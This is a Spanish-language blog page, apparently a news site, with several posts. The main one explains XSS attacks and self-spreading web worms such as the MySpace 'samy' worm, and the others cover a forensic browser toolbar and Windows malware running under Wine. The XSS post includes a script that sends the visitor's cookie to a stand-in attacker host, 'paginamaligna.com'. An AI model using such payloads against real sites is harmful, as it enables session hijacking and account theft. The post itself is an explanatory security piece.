Mar
17

Que es un gusano web y cómo funciona

nisti2 Noticias Add you comment

Antiguamente, los gusanos eran códigos maliciosos, preparados para extenderse rápidamente de sistema en sistema, mediante las redes p2p, el envío automatizado por correo, etc. Los gusanos eran programas informáticos, que al ejecutarlos, utilizaban tu ordenador para extenderse a muchos mas sistemas, sin que tu vieses absolutamente nada.

En la actualidad, con la extrema popularidad e importancia que tiene el mundo web, los gusanos han ido evolucionando, de forma que ha nacido un nuevo tipo de gusano, que no infecta tu ordenador, ni es un programa compilado que debes descargar, sino que es un pequeño fragmento de código javascript, que infecta tu perfil en alguna web.

Todo empezó con los agujeros de seguridad de tipo Cross Site Scripting (XSS), un tipo de agujero de seguridad, al que no se le presta tanta atención como a otros que a priori parecen mas peligrosos, como los Sql Injection, o similares, pero que es tanto o mas peligroso.

Pero para entender los web worms, debemos empezar desde muy al principio, desde las bases de los ataques tipo XSS. Un ataque XSS persigue, normalmente, robar la cookie del visitante. La cookie es una pequeña porción de información, que sirve para que la página web, recuerde que te has autenticado correctamente, y no te pida la contraseña cada vez que quieres hacer una acción.

Para robar la cookie, los ataques XSS se sirven de código javascript, ya que el código javascript se ejecuta en el navegador, tiene acceso a las cookies del mismo, sin embargo, por seguridad, un código javascript solo puede ver las cookies del sitio web que hospeda ese código javascript.

Es decir, si yo visito www.ejemplo.com, y esta web me envía un javascript que accede a las cookies, este javascript no podrá ver mis cookies de otras páginas web.

Y es en esa protección, en la que reside el peligro del Cross Site Scripting; imaginemos una página web que te pregunta tu nombre al entrar, tu lo introduces, y te muestra por pantalla: Hola! <nombreintroducido>. Si yo, en el nombre, introduzco:

<script>alert(document.cookie)</script>

Mi código javascript, podrá acceder a las cookies de esa página web, ya que el código javascript, el navegador, lo recibe a través de la web que me ha preguntado mi nombre.

¿Cual es el peligro real de todo esto?

Veamos un ejemplo ficticio, pero posible…Imaginemos que gmail tiene un error de seguridad, y permite introducir código javascript en el cuerpo de un mail, yo podría escribirte un mail que contubiese el siguiente código:

<script>document.location.href = ‘www.paginamaligna.com/recogercookie.php?cookie=’+document.cookie; </script>

Cuando tu abrieses el correo, el navegador te redirigiría hacía paginamaligna.com, pasándole por GET, tu cookie, a la cual hemos tenido acceso, ya que el javascript, para el navegador, procedía de gmail.

Una vez con tu cookie, borro mi cookie de gmail, y me pongo la tuya, ahora ya estoy autentificado en gmail, con tu nombre de usuario, y puedo leer tu correo.

Una vez entendido esto, entender los gusanos web (web worms) son fáciles de entender, imagina que yo estoy en una red social, y tengo un perfil público, en el cual hay un campo ‘intereses’, donde la gente pone lo que le gusta hacer. Si ese campo, permite introducir código HTML, sin filtrarlo, yo podría introducir:

<script>alert(document.cookie);</script>

Y cuando alguien visitase mi perfil, se mostrase su cookie. Si ahora en lugar de un alert, introduzco un código, que hace un petición POST a la red social, y modifica el perfil de la victima, introduciendo en el campo intereses, el mismo código malicioso que yo tengo, cada persona que entre, se le modificará automáticamente su perfil, y cada persona que vea ese perfil modificado, modificará automaticamente el suyo, y así sucesivamente.

En unas horas, todos los perfiles de una red social pueden estar modificados, es decir, infectados con el código.

Además, este código podría enviarle las cookies al autor original del código, mediante una petición invisible a alguna web (usando un iframe invisible, por ejemplo), de forma que no solo ha infectado todos los perfiles, sino que tiene todas las cookies, de todo el mundo, en la web.

Aunque todo esto suene rocambolesco, es una realidad, y ha sucedido ya en muchas ocasiones, siendo quizás la mas famosa, la de samy, un código javascript que infecto millones de perfiles en myspace, mediante un agujero de tipo XSS.

Como siempre, para protegerse de estos ataques, lo mejor es utilizar noscript, para firefox.

Via  rooibo.com

, , , , , , , ,
Dec
23

Noticias alrededor de la Red

nisti2 Noticias Add you comment

Guia Rapida de Noticias, que encontre via Vivalinux.com.ar

, , , , , , , , , , ,
Dec
03

Desarrollan una nueva herramienta para prevenir ciberdelitos

nisti2 Aplicaciones Add you comment

El tema de la seguridad informática es recurrente en el mundo web. A medida que más usuarios se suman a internet y las redes sociales, las chances de que haya más interés en conocer datos confidenciales para cometer delitos también crece. Y ya no alcanza con un sistema antivirus y un firewall. En principio, se requiere mucha conciencia y luego implementar las herramientas que cada uno cree que son las mejores.

En este caso, la empresa mexicana MaTTica, especializada en buscar las evidencias que quedan en las máquinas y las redes cuando se ha cometido un delito informático -algo así como un CSI de la computación-, desarrolló una aplicación para las barras de navegación de Google, Firefox, Explorer y Safari.
La Barra de Herramientas MaTTica es una aplicación gratuita para navegadores para unificar en un solo punto los elementos que les interesa a los usuarios de internet. Permite realizar búsquedas de contenido, traducciones, información de cómputo forense, enlaces de interés y recomendaciones, entre otros aspectos.
La herramienta se puede descargar desde el sitio de MaTTica, donde se encuentra el video tutorial que explica cómo proceder, y que acompaña este comentario.
Como se dijo, la aplicación es gratuita y puede ser empleada tanto en computadoras de particulares como en empresas y en entidades de Gobierno. En cada caso se puede personalizar de acuerdo a las principales actividades que cada uno realiza.
Estas son algunas de las principales funciones contenidas en la barra de Mattica:

  • Búsquedas: permite buscar en Google, así como en la página que se navega o la corporativa de MaTTica, cualquier contenido solicitado por el usuario, además incluye otras funciones como la búsqueda de imágenes o noticias relacionadas con ese término.
  • IP con la que el usuario puede identificar su propia red IP(Protocolo para identificar origen y destino de la conexión): permite buscar el origen de la conexión, reconocimiento del DNS, obtener e investigar la programación de una página web, y links a otras herramientas.
  • Correo: es un botón de funciones para el rastreo del correo electrónico, además, herramienta para la extracción del encabezado (headers)
  • Web: es un apartado que cuenta con herramientas, páginas y vínculos para hacer investigaciones y búsquedas, Como archive.org, página donde se puede ver el proceso en el tiempo de una página web. Además, links para búsqueda de imágenes y personas en Internet y redes sociales, detección de extensiones de archivos, entre otras.
  • Computo Forense: es una herramienta donde el usuario encontrará información sobre las principales certificaciones en este ramo, Así como herramientas para realizar investigaciones en celulares, principales proveedores, así como la recuperación y análisis de las contraseñas.
  • Traduce esta página: es un sencillo traductor con la capacidad de detectar el idioma de origen para trasladarlo al español
  • Links: son enlaces a temas de interés de MaTTica, próximos cursos y certificaciones así como links a blogs de interés
  • Noticias: vincula con publicaciones realizadas en el Twitter corporativo de MaTTica: www.twitter.com/csi_mattica
  • Mensajes: es un tablero de mensajes a la comunidad que ha descargado la barra.
  • Comentarios: permite realizar precisamente comentarios directos a los administradores de la barra de herramientas MaTTica
, , , , , , , , , ,
Oct
29

Virus en Linux a través de Wine

nisti2 Uncategorized Add you comment

Wine, el servicio de virtualización de aplicaciones de Windows sobre Linux ha avanzado tanto en su desarrollo que puede llegar a ser infectado por virus de Windows. Aunque estamos hablando de afectar exclusivamente a los programas que corran sobre Wine y no, por tanto, al sistema operativo GNU/Linux en cuestión.

Teniendo en cuenta la experiencia relatada en el blog opensourcenerd, en la que de manera totalmente consciente se instala un programa malware que se hace pasar como antivirus, Windows Police Pro, se puede concluir que Wine ejecuta de manera excepcionalmente fidedigna software creado para Windows sobre Linux ya que hasta malware y virus corren de forma correcta.

Tras la instalación, y los múltiples avisos de Firefox de sitio no seguro, aplicación no segura y demás, el sistema de Wine se vio modificado incluyendo explorer.exe, algo que hizo que para limpiar el sistema se tuviera que eliminar (purgar) completamente el paquete y volver a instalarlo.

Via the inquirer

, , , ,